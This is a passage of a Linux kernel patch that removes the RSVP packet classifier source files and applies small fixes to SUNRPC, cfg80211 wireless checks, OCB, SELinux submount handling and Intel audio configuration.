+-   of "rsvp sessions", identified by destination address, protocol and
+-   DPI(="Destination Port ID"): triple (key, mask, offset).
+-
+-   Every bucket has a smaller hash table keyed by source address
+-   (cf. RSVP flowspec) and one wildcard entry for wildcard reservations.
+-   Every bucket is again a list of "RSVP flows", selected by
+-   source address and SPI(="Source Port ID" here rather than
+-   "security parameter index"): triple (key, mask, offset).
+-
+-
+-   NOTE 1. All the packets with IPv6 extension headers (but AH and ESP)
+-   and all fragmented packets go to the best-effort traffic class.
+-
+-
+-   NOTE 2. Two "port id"'s seems to be redundant, rfc2207 requires
+-   only one "Generalized Port Identifier". So that for classic
+-   ah, esp (and udp,tcp) both *pi should coincide or one of them
+-   should be wildcard.
+-
+-   At first sight, this redundancy is just a waste of CPU
+-   resources. But DPI and SPI add the possibility to assign different
+-   priorities to GPIs. Look also at note 4 about tunnels below.
+-
+-
+-   NOTE 3. One complication is the case of tunneled packets.
+-   We implement it as following: if the first lookup
+-   matches a special session with "tunnelhdr" value not zero,
+-   flowid doesn't contain the true flow ID, but the tunnel ID (1...255).
+-   In this case, we pull tunnelhdr bytes and restart lookup
+-   with tunnel ID added to the list of keys. Simple and stupid 8)8)
+-   It's enough for PIMREG and IPIP.
+-
+-
+-   NOTE 4. Two GPIs make it possible to parse even GRE packets.
+-   F.e. DPI can select ETH_P_IP (and necessary flags to make
+-   tunnelhdr correct) in GRE protocol field and SPI matches
+-   GRE key. Is it not nice? 8)8)
+-
+-
+-   Well, as result, despite its simplicity, we get a pretty
+-   powerful classification engine.  */
+-
+-
+-struct rsvp_head {
+-	u32			tmap[256/32];
+-	u32			hgenerator;
+-	u8			tgenerator;
+-	struct rsvp_session __rcu *ht[256];
+-	struct rcu_head		rcu;
+-};
+-
+-struct rsvp_session {
+-	struct rsvp_session __rcu	*next;
+-	__be32				dst[RSVP_DST_LEN];
+-	struct tc_rsvp_gpi		dpi;
+-	u8				protocol;
+-	u8				tunnelid;
+-	/* 16 (src,sport) hash slots, and one wildcard source slot */
+-	struct rsvp_filter __rcu	*ht[16 + 1];
+-	struct rcu_head			rcu;
+-};
+-
+-
+-struct rsvp_filter {
+-	struct rsvp_filter __rcu	*next;
+-	__be32				src[RSVP_DST_LEN];
+-	struct tc_rsvp_gpi		spi;
+-	u8				tunnelhdr;
+-
+-	struct tcf_result		res;
+-	struct tcf_exts			exts;
+-
+-	u32				handle;
+-	struct rsvp_session		*sess;
+-	struct rcu_work			rwork;
+-};
+-
+-static inline unsigned int hash_dst(__be32 *dst, u8 protocol, u8 tunnelid)
+-{
+-	unsigned int h = (__force __u32)dst[RSVP_DST_LEN - 1];
+-
+-	h ^= h>>16;
+-	h ^= h>>8;
+-	return (h ^ protocol ^ tunnelid) & 0xFF;
+-}
+-
+-static inline unsigned int hash_src(__be32 *src)
+-{
+-	unsigned int h = (__force __u32)src[RSVP_DST_LEN-1];
+-
+-	h ^= h>>16;
+-	h ^= h>>8;
+-	h ^= h>>4;
+-	return h & 0xF;
+-}
+-
+-#define RSVP_APPLY_RESULT()				\
+-{							\
+-	int r = tcf_exts_exec(skb, &f->exts, res);	\
+-	if (r < 0)					\
+-		continue;				\
+-	else if (r > 0)					\
+-		return r;				\
+-}
+-
+-static int rsvp_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+-			 struct tcf_result *res)
+-{
+-	struct rsvp_head *head = rcu_dereference_bh(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter *f;
+-	unsigned int h1, h2;
+-	__be32 *dst, *src;
+-	u8 protocol;
+-	u8 tunnelid = 0;
+-	u8 *xprt;
+-#if RSVP_DST_LEN == 4
+-	struct ipv6hdr *nhptr;
+-
+-	if (!pskb_network_may_pull(skb, sizeof(*nhptr)))
+-		return -1;
+-	nhptr = ipv6_hdr(skb);
+-#else
+-	struct iphdr *nhptr;
+-
+-	if (!pskb_network_may_pull(skb, sizeof(*nhptr)))
+-		return -1;
+-	nhptr = ip_hdr(skb);
+-#endif
+-restart:
+-
+-#if RSVP_DST_LEN == 4
+-	src = &nhptr->saddr.s6_addr32[0];
+-	dst = &nhptr->daddr.s6_addr32[0];
+-	protocol = nhptr->nexthdr;
+-	xprt = ((u8 *)nhptr) + sizeof(struct ipv6hdr);
+-#else
+-	src = &nhptr->saddr;
+-	dst = &nhptr->daddr;
+-	protocol = nhptr->protocol;
+-	xprt = ((u8 *)nhptr) + (nhptr->ihl<<2);
+-	if (ip_is_fragment(nhptr))
+-		return -1;
+-#endif
+-
+-	h1 = hash_dst(dst, protocol, tunnelid);
+-	h2 = hash_src(src);
+-
+-	for (s = rcu_dereference_bh(head->ht[h1]); s;
+-	     s = rcu_dereference_bh(s->next)) {
+-		if (dst[RSVP_DST_LEN-1] == s->dst[RSVP_DST_LEN - 1] &&
+-		    protocol == s->protocol &&
+-		    !(s->dpi.mask &
+-		      (*(u32 *)(xprt + s->dpi.offset) ^ s->dpi.key)) &&
+-#if RSVP_DST_LEN == 4
+-		    dst[0] == s->dst[0] &&
+-		    dst[1] == s->dst[1] &&
+-		    dst[2] == s->dst[2] &&
+-#endif
+-		    tunnelid == s->tunnelid) {
+-
+-			for (f = rcu_dereference_bh(s->ht[h2]); f;
+-			     f = rcu_dereference_bh(f->next)) {
+-				if (src[RSVP_DST_LEN-1] == f->src[RSVP_DST_LEN - 1] &&
+-				    !(f->spi.mask & (*(u32 *)(xprt + f->spi.offset) ^ f->spi.key))
+-#if RSVP_DST_LEN == 4
+-				    &&
+-				    src[0] == f->src[0] &&
+-				    src[1] == f->src[1] &&
+-				    src[2] == f->src[2]
+-#endif
+-				    ) {
+-					*res = f->res;
+-					RSVP_APPLY_RESULT();
+-
+-matched:
+-					if (f->tunnelhdr == 0)
+-						return 0;
+-
+-					tunnelid = f->res.classid;
+-					nhptr = (void *)(xprt + f->tunnelhdr - sizeof(*nhptr));
+-					goto restart;
+-				}
+-			}
+-
+-			/* And wildcard bucket... */
+-			for (f = rcu_dereference_bh(s->ht[16]); f;
+-			     f = rcu_dereference_bh(f->next)) {
+-				*res = f->res;
+-				RSVP_APPLY_RESULT();
+-				goto matched;
+-			}
+-			return -1;
+-		}
+-	}
+-	return -1;
+-}
+-
+-static void rsvp_replace(struct tcf_proto *tp, struct rsvp_filter *n, u32 h)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter __rcu **ins;
+-	struct rsvp_filter *pins;
+-	unsigned int h1 = h & 0xFF;
+-	unsigned int h2 = (h >> 8) & 0xFF;
+-
+-	for (s = rtnl_dereference(head->ht[h1]); s;
+-	     s = rtnl_dereference(s->next)) {
+-		for (ins = &s->ht[h2], pins = rtnl_dereference(*ins); ;
+-		     ins = &pins->next, pins = rtnl_dereference(*ins)) {
+-			if (pins->handle == h) {
+-				RCU_INIT_POINTER(n->next, pins->next);
+-				rcu_assign_pointer(*ins, n);
+-				return;
+-			}
+-		}
+-	}
+-
+-	/* Something went wrong if we are trying to replace a non-existent
+-	 * node. Mind as well halt instead of silently failing.
+-	 */
+-	BUG_ON(1);
+-}
+-
+-static void *rsvp_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter *f;
+-	unsigned int h1 = handle & 0xFF;
+-	unsigned int h2 = (handle >> 8) & 0xFF;
+-
+-	if (h2 > 16)
+-		return NULL;
+-
+-	for (s = rtnl_dereference(head->ht[h1]); s;
+-	     s = rtnl_dereference(s->next)) {
+-		for (f = rtnl_dereference(s->ht[h2]); f;
+-		     f = rtnl_dereference(f->next)) {
+-			if (f->handle == handle)
+-				return f;
+-		}
+-	}
+-	return NULL;
+-}
+-
+-static int rsvp_init(struct tcf_proto *tp)
+-{
+-	struct rsvp_head *data;
+-
+-	data = kzalloc(sizeof(struct rsvp_head), GFP_KERNEL);
+-	if (data) {
+-		rcu_assign_pointer(tp->root, data);
+-		return 0;
+-	}
+-	return -ENOBUFS;
+-}
+-
+-static void __rsvp_delete_filter(struct rsvp_filter *f)
+-{
+-	tcf_exts_destroy(&f->exts);
+-	tcf_exts_put_net(&f->exts);
+-	kfree(f);
+-}
+-
+-static void rsvp_delete_filter_work(struct work_struct *work)
+-{
+-	struct rsvp_filter *f = container_of(to_rcu_work(work),
+-					     struct rsvp_filter,
+-					     rwork);
+-	rtnl_lock();
+-	__rsvp_delete_filter(f);
+-	rtnl_unlock();
+-}
+-
+-static void rsvp_delete_filter(struct tcf_proto *tp, struct rsvp_filter *f)
+-{
+-	tcf_unbind_filter(tp, &f->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (tcf_exts_get_net(&f->exts))
+-		tcf_queue_work(&f->rwork, rsvp_delete_filter_work);
+-	else
+-		__rsvp_delete_filter(f);
+-}
+-
+-static void rsvp_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	int h1, h2;
+-
+-	if (data == NULL)
+-		return;
+-
+-	for (h1 = 0; h1 < 256; h1++) {
+-		struct rsvp_session *s;
+-
+-		while ((s = rtnl_dereference(data->ht[h1])) != NULL) {
+-			RCU_INIT_POINTER(data->ht[h1], s->next);
+-
+-			for (h2 = 0; h2 <= 16; h2++) {
+-				struct rsvp_filter *f;
+-
+-				while ((f = rtnl_dereference(s->ht[h2])) != NULL) {
+-					rcu_assign_pointer(s->ht[h2], f->next);
+-					rsvp_delete_filter(tp, f);
+-				}
+-			}
+-			kfree_rcu(s, rcu);
+-		}
+-	}
+-	kfree_rcu(data, rcu);
+-}
+-
+-static int rsvp_delete(struct tcf_proto *tp, void *arg, bool *last,
+-		       bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_filter *nfp, *f = arg;
+-	struct rsvp_filter __rcu **fp;
+-	unsigned int h = f->handle;
+-	struct rsvp_session __rcu **sp;
+-	struct rsvp_session *nsp, *s = f->sess;
+-	int i, h1;
+-
+-	fp = &s->ht[(h >> 8) & 0xFF];
+-	for (nfp = rtnl_dereference(*fp); nfp;
+-	     fp = &nfp->next, nfp = rtnl_dereference(*fp)) {
+-		if (nfp == f) {
+-			RCU_INIT_POINTER(*fp, f->next);
+-			rsvp_delete_filter(tp, f);
+-
+-			/* Strip tree */
+-
+-			for (i = 0; i <= 16; i++)
+-				if (s->ht[i])
+-					goto out;
+-
+-			/* OK, session has no flows */
+-			sp = &head->ht[h & 0xFF];
+-			for (nsp = rtnl_dereference(*sp); nsp;
+-			     sp = &nsp->next, nsp = rtnl_dereference(*sp)) {
+-				if (nsp == s) {
+-					RCU_INIT_POINTER(*sp, s->next);
+-					kfree_rcu(s, rcu);
+-					goto out;
+-				}
+-			}
+-
+-			break;
+-		}
+-	}
+-
+-out:
+-	*last = true;
+-	for (h1 = 0; h1 < 256; h1++) {
+-		if (rcu_access_pointer(head->ht[h1])) {
+-			*last = false;
+-			break;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static unsigned int gen_handle(struct tcf_proto *tp, unsigned salt)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	int i = 0xFFFF;
+-
+-	while (i-- > 0) {
+-		u32 h;
+-
+-		if ((data->hgenerator += 0x10000) == 0)
+-			data->hgenerator = 0x10000;
+-		h = data->hgenerator|salt;
+-		if (!rsvp_get(tp, h))
+-			return h;
+-	}
+-	return 0;
+-}
+-
+-static int tunnel_bts(struct rsvp_head *data)
+-{
+-	int n = data->tgenerator >> 5;
+-	u32 b = 1 << (data->tgenerator & 0x1F);
+-
+-	if (data->tmap[n] & b)
+-		return 0;
+-	data->tmap[n] |= b;
+-	return 1;
+-}
+-
+-static void tunnel_recycle(struct rsvp_head *data)
+-{
+-	struct rsvp_session __rcu **sht = data->ht;
+-	u32 tmap[256/32];
+-	int h1, h2;
+-
+-	memset(tmap, 0, sizeof(tmap));
+-
+-	for (h1 = 0; h1 < 256; h1++) {
+-		struct rsvp_session *s;
+-		for (s = rtnl_dereference(sht[h1]); s;
+-		     s = rtnl_dereference(s->next)) {
+-			for (h2 = 0; h2 <= 16; h2++) {
+-				struct rsvp_filter *f;
+-
+-				for (f = rtnl_dereference(s->ht[h2]); f;
+-				     f = rtnl_dereference(f->next)) {
+-					if (f->tunnelhdr == 0)
+-						continue;
+-					data->tgenerator = f->res.classid;
+-					tunnel_bts(data);
+-				}
+-			}
+-		}
+-	}
+-
+-	memcpy(data->tmap, tmap, sizeof(tmap));
+-}
+-
+-static u32 gen_tunnel(struct rsvp_head *data)
+-{
+-	int i, k;
+-
+-	for (k = 0; k < 2; k++) {
+-		for (i = 255; i > 0; i--) {
+-			if (++data->tgenerator == 0)
+-				data->tgenerator = 1;
+-			if (tunnel_bts(data))
+-				return data->tgenerator;
+-		}
+-		tunnel_recycle(data);
+-	}
+-	return 0;
+-}
+-
+-static const struct nla_policy rsvp_policy[TCA_RSVP_MAX + 1] = {
+-	[TCA_RSVP_CLASSID]	= { .type = NLA_U32 },
+-	[TCA_RSVP_DST]		= { .len = RSVP_DST_LEN * sizeof(u32) },
+-	[TCA_RSVP_SRC]		= { .len = RSVP_DST_LEN * sizeof(u32) },
+-	[TCA_RSVP_PINFO]	= { .len = sizeof(struct tc_rsvp_pinfo) },
+-};
+-
+-static int rsvp_change(struct net *net, struct sk_buff *in_skb,
+-		       struct tcf_proto *tp, unsigned long base,
+-		       u32 handle, struct nlattr **tca,
+-		       void **arg, u32 flags,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	struct rsvp_filter *f, *nfp;
+-	struct rsvp_filter __rcu **fp;
+-	struct rsvp_session *nsp, *s;
+-	struct rsvp_session __rcu **sp;
+-	struct tc_rsvp_pinfo *pinfo = NULL;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_RSVP_MAX + 1];
+-	struct tcf_exts e;
+-	unsigned int h1, h2;
+-	__be32 *dst;
+-	int err;
+-
+-	if (opt == NULL)
+-		return handle ? -EINVAL : 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_RSVP_MAX, opt, rsvp_policy,
+-					  NULL);
+-	if (err < 0)
+-		return err;
+-
+-	err = tcf_exts_init(&e, net, TCA_RSVP_ACT, TCA_RSVP_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, tca[TCA_RATE], &e, flags,
+-				extack);
+-	if (err < 0)
+-		goto errout2;
+-
+-	f = *arg;
+-	if (f) {
+-		/* Node exists: adjust only classid */
+-		struct rsvp_filter *n;
+-
+-		if (f->handle != handle && handle)
+-			goto errout2;
+-
+-		n = kmemdup(f, sizeof(*f), GFP_KERNEL);
+-		if (!n) {
+-			err = -ENOMEM;
+-			goto errout2;
+-		}
+-
+-		err = tcf_exts_init(&n->exts, net, TCA_RSVP_ACT,
+-				    TCA_RSVP_POLICE);
+-		if (err < 0) {
+-			kfree(n);
+-			goto errout2;
+-		}
+-
+-		if (tb[TCA_RSVP_CLASSID]) {
+-			n->res.classid = nla_get_u32(tb[TCA_RSVP_CLASSID]);
+-			tcf_bind_filter(tp, &n->res, base);
+-		}
+-
+-		tcf_exts_change(&n->exts, &e);
+-		rsvp_replace(tp, n, handle);
+-		return 0;
+-	}
+-
+-	/* Now more serious part... */
+-	err = -EINVAL;
+-	if (handle)
+-		goto errout2;
+-	if (tb[TCA_RSVP_DST] == NULL)
+-		goto errout2;
+-
+-	err = -ENOBUFS;
+-	f = kzalloc(sizeof(struct rsvp_filter), GFP_KERNEL);
+-	if (f == NULL)
+-		goto errout2;
+-
+-	err = tcf_exts_init(&f->exts, net, TCA_RSVP_ACT, TCA_RSVP_POLICE);
+-	if (err < 0)
+-		goto errout;
+-	h2 = 16;
+-	if (tb[TCA_RSVP_SRC]) {
+-		memcpy(f->src, nla_data(tb[TCA_RSVP_SRC]), sizeof(f->src));
+-		h2 = hash_src(f->src);
+-	}
+-	if (tb[TCA_RSVP_PINFO]) {
+-		pinfo = nla_data(tb[TCA_RSVP_PINFO]);
+-		f->spi = pinfo->spi;
+-		f->tunnelhdr = pinfo->tunnelhdr;
+-	}
+-	if (tb[TCA_RSVP_CLASSID])
+-		f->res.classid = nla_get_u32(tb[TCA_RSVP_CLASSID]);
+-
+-	dst = nla_data(tb[TCA_RSVP_DST]);
+-	h1 = hash_dst(dst, pinfo ? pinfo->protocol : 0, pinfo ? pinfo->tunnelid : 0);
+-
+-	err = -ENOMEM;
+-	if ((f->handle = gen_handle(tp, h1 | (h2<<8))) == 0)
+-		goto errout;
+-
+-	if (f->tunnelhdr) {
+-		err = -EINVAL;
+-		if (f->res.classid > 255)
+-			goto errout;
+-
+-		err = -ENOMEM;
+-		if (f->res.classid == 0 &&
+-		    (f->res.classid = gen_tunnel(data)) == 0)
+-			goto errout;
+-	}
+-
+-	for (sp = &data->ht[h1];
+-	     (s = rtnl_dereference(*sp)) != NULL;
+-	     sp = &s->next) {
+-		if (dst[RSVP_DST_LEN-1] == s->dst[RSVP_DST_LEN-1] &&
+-		    pinfo && pinfo->protocol == s->protocol &&
+-		    memcmp(&pinfo->dpi, &s->dpi, sizeof(s->dpi)) == 0 &&
+-#if RSVP_DST_LEN == 4
+-		    dst[0] == s->dst[0] &&
+-		    dst[1] == s->dst[1] &&
+-		    dst[2] == s->dst[2] &&
+-#endif
+-		    pinfo->tunnelid == s->tunnelid) {
+-
+-insert:
+-			/* OK, we found appropriate session */
+-
+-			fp = &s->ht[h2];
+-
+-			f->sess = s;
+-			if (f->tunnelhdr == 0)
+-				tcf_bind_filter(tp, &f->res, base);
+-
+-			tcf_exts_change(&f->exts, &e);
+-
+-			fp = &s->ht[h2];
+-			for (nfp = rtnl_dereference(*fp); nfp;
+-			     fp = &nfp->next, nfp = rtnl_dereference(*fp)) {
+-				__u32 mask = nfp->spi.mask & f->spi.mask;
+-
+-				if (mask != f->spi.mask)
+-					break;
+-			}
+-			RCU_INIT_POINTER(f->next, nfp);
+-			rcu_assign_pointer(*fp, f);
+-
+-			*arg = f;
+-			return 0;
+-		}
+-	}
+-
+-	/* No session found. Create new one. */
+-
+-	err = -ENOBUFS;
+-	s = kzalloc(sizeof(struct rsvp_session), GFP_KERNEL);
+-	if (s == NULL)
+-		goto errout;
+-	memcpy(s->dst, dst, sizeof(s->dst));
+-
+-	if (pinfo) {
+-		s->dpi = pinfo->dpi;
+-		s->protocol = pinfo->protocol;
+-		s->tunnelid = pinfo->tunnelid;
+-	}
+-	sp = &data->ht[h1];
+-	for (nsp = rtnl_dereference(*sp); nsp;
+-	     sp = &nsp->next, nsp = rtnl_dereference(*sp)) {
+-		if ((nsp->dpi.mask & s->dpi.mask) != s->dpi.mask)
+-			break;
+-	}
+-	RCU_INIT_POINTER(s->next, nsp);
+-	rcu_assign_pointer(*sp, s);
+-
+-	goto insert;
+-
+-errout:
+-	tcf_exts_destroy(&f->exts);
+-	kfree(f);
+-errout2:
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static void rsvp_walk(struct tcf_proto *tp, struct tcf_walker *arg,
+-		      bool rtnl_held)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	unsigned int h, h1;
+-
+-	if (arg->stop)
+-		return;
+-
+-	for (h = 0; h < 256; h++) {
+-		struct rsvp_session *s;
+-
+-		for (s = rtnl_dereference(head->ht[h]); s;
+-		     s = rtnl_dereference(s->next)) {
+-			for (h1 = 0; h1 <= 16; h1++) {
+-				struct rsvp_filter *f;
+-
+-				for (f = rtnl_dereference(s->ht[h1]); f;
+-				     f = rtnl_dereference(f->next)) {
+-					if (!tc_cls_stats_dump(tp, arg, f))
+-						return;
+-				}
+-			}
+-		}
+-	}
+-}
+-
+-static int rsvp_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-		     struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct rsvp_filter *f = fh;
+-	struct rsvp_session *s;
+-	struct nlattr *nest;
+-	struct tc_rsvp_pinfo pinfo;
+-
+-	if (f == NULL)
+-		return skb->len;
+-	s = f->sess;
+-
+-	t->tcm_handle = f->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (nla_put(skb, TCA_RSVP_DST, sizeof(s->dst), &s->dst))
+-		goto nla_put_failure;
+-	pinfo.dpi = s->dpi;
+-	pinfo.spi = f->spi;
+-	pinfo.protocol = s->protocol;
+-	pinfo.tunnelid = s->tunnelid;
+-	pinfo.tunnelhdr = f->tunnelhdr;
+-	pinfo.pad = 0;
+-	if (nla_put(skb, TCA_RSVP_PINFO, sizeof(pinfo), &pinfo))
+-		goto nla_put_failure;
+-	if (f->res.classid &&
+-	    nla_put_u32(skb, TCA_RSVP_CLASSID, f->res.classid))
+-		goto nla_put_failure;
+-	if (((f->handle >> 8) & 0xFF) != 16 &&
+-	    nla_put(skb, TCA_RSVP_SRC, sizeof(f->src), f->src))
+-		goto nla_put_failure;
+-
+-	if (tcf_exts_dump(skb, &f->exts) < 0)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, nest);
+-
+-	if (tcf_exts_dump_stats(skb, &f->exts) < 0)
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void rsvp_bind_class(void *fh, u32 classid, unsigned long cl, void *q,
+-			    unsigned long base)
+-{
+-	struct rsvp_filter *f = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &f->res, base);
+-}
+-
+-static struct tcf_proto_ops RSVP_OPS __read_mostly = {
+-	.kind		=	RSVP_ID,
+-	.classify	=	rsvp_classify,
+-	.init		=	rsvp_init,
+-	.destroy	=	rsvp_destroy,
+-	.get		=	rsvp_get,
+-	.change		=	rsvp_change,
+-	.delete		=	rsvp_delete,
+-	.walk		=	rsvp_walk,
+-	.dump		=	rsvp_dump,
+-	.bind_class	=	rsvp_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_rsvp(void)
+-{
+-	return register_tcf_proto_ops(&RSVP_OPS);
+-}
+-
+-static void __exit exit_rsvp(void)
+-{
+-	unregister_tcf_proto_ops(&RSVP_OPS);
+-}
+-
+-module_init(init_rsvp)
+-module_exit(exit_rsvp)
+diff --git a/net/sched/cls_rsvp6.c b/net/sched/cls_rsvp6.c
+deleted file mode 100644
+index 64078846000ef..0000000000000
+--- a/net/sched/cls_rsvp6.c
++++ /dev/null
+@@ -1,24 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/cls_rsvp6.c	Special RSVP packet classifier for IPv6.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/ipv6.h>
+-#include <linux/skbuff.h>
+-#include <net/act_api.h>
+-#include <net/pkt_cls.h>
+-#include <net/netlink.h>
+-
+-#define RSVP_DST_LEN	4
+-#define RSVP_ID		"rsvp6"
+-#define RSVP_OPS	cls_rsvp6_ops
+-
+-#include "cls_rsvp.h"
+-MODULE_LICENSE("GPL");
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index d2ee566343083..b0258507b236c 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2710,7 +2710,7 @@ out_unparsable:
+ 
+ out_verifier:
+ 	trace_rpc_bad_verifier(task);
+-	goto out_err;
++	goto out_garbage;
+ 
+ out_msg_denied:
+ 	error = -EACCES;
+diff --git a/net/wireless/mlme.c b/net/wireless/mlme.c
+index 581df7f4c5240..e7fa0608341d8 100644
+--- a/net/wireless/mlme.c
++++ b/net/wireless/mlme.c
+@@ -277,6 +277,11 @@ int cfg80211_mlme_auth(struct cfg80211_registered_device *rdev,
+ 	    ether_addr_equal(req->bss->bssid, wdev->u.client.connected_addr))
+ 		return -EALREADY;
+ 
++	if (ether_addr_equal(req->bss->bssid, dev->dev_addr) ||
++	    (req->link_id >= 0 &&
++	     ether_addr_equal(req->ap_mld_addr, dev->dev_addr)))
++		return -EINVAL;
++
+ 	return rdev_auth(rdev, dev, req);
+ }
+ 
+@@ -331,6 +336,9 @@ int cfg80211_mlme_assoc(struct cfg80211_registered_device *rdev,
+ 			if (req->links[i].bss == req->links[j].bss)
+ 				return -EINVAL;
+ 		}
++
++		if (ether_addr_equal(req->links[i].bss->bssid, dev->dev_addr))
++			return -EINVAL;
+ 	}
+ 
+ 	if (wdev->connected &&
+@@ -338,6 +346,11 @@ int cfg80211_mlme_assoc(struct cfg80211_registered_device *rdev,
+ 	     !ether_addr_equal(wdev->u.client.connected_addr, req->prev_bssid)))
+ 		return -EALREADY;
+ 
++	if ((req->bss && ether_addr_equal(req->bss->bssid, dev->dev_addr)) ||
++	    (req->link_id >= 0 &&
++	     ether_addr_equal(req->ap_mld_addr, dev->dev_addr)))
++		return -EINVAL;
++
+ 	cfg80211_oper_and_ht_capa(&req->ht_capa_mask,
+ 				  rdev->wiphy.ht_capa_mod_mask);
+ 	cfg80211_oper_and_vht_capa(&req->vht_capa_mask,
+diff --git a/net/wireless/ocb.c b/net/wireless/ocb.c
+index 27a1732264f95..29afaf3da54f3 100644
+--- a/net/wireless/ocb.c
++++ b/net/wireless/ocb.c
+@@ -68,6 +68,9 @@ int __cfg80211_leave_ocb(struct cfg80211_registered_device *rdev,
+ 	if (!rdev->ops->leave_ocb)
+ 		return -EOPNOTSUPP;
+ 
++	if (!wdev->u.ocb.chandef.chan)
++		return -ENOTCONN;
++
+ 	err = rdev_leave_ocb(rdev, dev);
+ 	if (!err)
+ 		memset(&wdev->u.ocb.chandef, 0, sizeof(wdev->u.ocb.chandef));
+diff --git a/samples/hw_breakpoint/data_breakpoint.c b/samples/hw_breakpoint/data_breakpoint.c
+index 418c46fe5ffc3..b99322f188e59 100644
+--- a/samples/hw_breakpoint/data_breakpoint.c
++++ b/samples/hw_breakpoint/data_breakpoint.c
+@@ -70,7 +70,9 @@ fail:
+ static void __exit hw_break_module_exit(void)
+ {
+ 	unregister_wide_hw_breakpoint(sample_hbp);
+-	symbol_put(ksym_name);
++#ifdef CONFIG_MODULE_UNLOAD
++	__symbol_put(ksym_name);
++#endif
+ 	printk(KERN_INFO "HW Breakpoint for %s write uninstalled\n", ksym_name);
+ }
+ 
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index 26c9e4da4efcf..d88c399b0e86b 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2769,14 +2769,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ static int selinux_fs_context_submount(struct fs_context *fc,
+ 				   struct super_block *reference)
+ {
+-	const struct superblock_security_struct *sbsec;
++	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
+ 	struct selinux_mnt_opts *opts;
+ 
++	/*
++	 * Ensure that fc->security remains NULL when no options are set
++	 * as expected by selinux_set_mnt_opts().
++	 */
++	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
++		return 0;
++
+ 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
+ 	if (!opts)
+ 		return -ENOMEM;
+ 
+-	sbsec = selinux_superblock(reference);
+ 	if (sbsec->flags & FSCONTEXT_MNT)
+ 		opts->fscontext_sid = sbsec->sid;
+ 	if (sbsec->flags & CONTEXT_MNT)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index 317bdf6dcbef4..2873420c9aca8 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -481,6 +481,14 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Lunar Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_LUNARLAKE)
++	/* Lunarlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = PCI_DEVICE_ID_INTEL_HDA_LNL_P,
++	},
++#endif
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 064b6feb76167..414ac90273810 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -388,7 +388,9 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Google"),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Rex"),
+ 		},
+-		.driver_data = (void *)(SOF_SDW_PCH_DMIC),
++		.driver_data = (void *)(SOF_SDW_PCH_DMIC |
++					SOF_BT_OFFLOAD_SSP(1) |
++					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 	},
+ 	/* LunarLake devices */
+ 	{
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index 872e44408298f..e7305ce57ea1f 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -1086,16 +1086,17 @@ static void sof_disconnect_dai_widget(struct snd_soc_component *scomp,
+ {
+ 	struct snd_soc_card *card = scomp->card;
+ 	struct snd_soc_pcm_runtime *rtd;
++	const char *sname = w->sname;
